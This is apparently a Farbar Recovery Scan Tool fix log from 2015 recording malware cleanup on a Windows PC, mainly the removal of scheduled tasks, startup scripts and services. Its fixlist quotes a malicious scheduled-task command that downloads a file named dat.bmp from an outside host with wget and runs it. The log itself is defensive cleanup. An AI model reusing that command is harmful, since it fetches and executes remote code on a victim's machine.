Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 12-04-2015
Ran by olila at 2015-04-14 17:09:59 Run:1
Running from H:\FRST
Loaded Profiles: olila (Available profiles: olila)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
CreateRestorePoint:
Startup: C:\Users\olila\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs ()
Task: {8EEE3983-76EA-4F2F-8976-35675C6DC2B8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=By1vykaB59;setup.exe;1422133484 & start cmd /R dat.bmp <==== ATTENTION
Task: {FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4} - System32\Tasks\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A} => pcalua.exe -a "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk\brunins.exe" -d "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk"
HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Run: [AdobeBridge] => [X]
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S3 cpuz136; \??\C:\Users\olila\AppData\Local\Temp\cpuz136\cpuz136_x64.sys [X]
S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X]
S3 IT9135BDA; System32\Drivers\IT9135BDA.sys [X]
C:\ProgramData\dat.bmp
C:\ProgramData\TEMP
C:\Users\olila\AppData\Roaming\bsplayerpro.exe
C:\Users\olila\AppData\Roaming\update.vbs
C:\Windows\pss\update.vbs.Startup
C:\Windows\SysWOW64\srvany.exe
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^olila^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^update.vbs" /f
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
C:\Users\olila\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8EEE3983-76EA-4F2F-8976-35675C6DC2B8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8EEE3983-76EA-4F2F-8976-35675C6DC2B8}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEM => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4}" => Key deleted successfully.
C:\Windows\System32\Tasks\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A}" => Key deleted successfully.
HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff => value deleted successfully.
HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => value deleted successfully.
ACDaemon => Service deleted successfully.
cpuz136 => Service deleted successfully.
GPUZ => Service deleted successfully.
IT9135BDA => Service deleted successfully.
C:\ProgramData\dat.bmp => Moved successfully.
C:\ProgramData\TEMP => Moved successfully.
C:\Users\olila\AppData\Roaming\bsplayerpro.exe => Moved successfully.
C:\Users\olila\AppData\Roaming\update.vbs => Moved successfully.
C:\Windows\pss\update.vbs.Startup => Moved successfully.
C:\Windows\SysWOW64\srvany.exe => Moved successfully.

========= reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^olila^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^update.vbs" /f =========

Operacja ukończona pomyślnie.

========= End of Reg: =========

EmptyTemp: => Removed 818.1 MB temporary data.

The system needed a reboot.

==== End of Fixlog 17:14:06 ====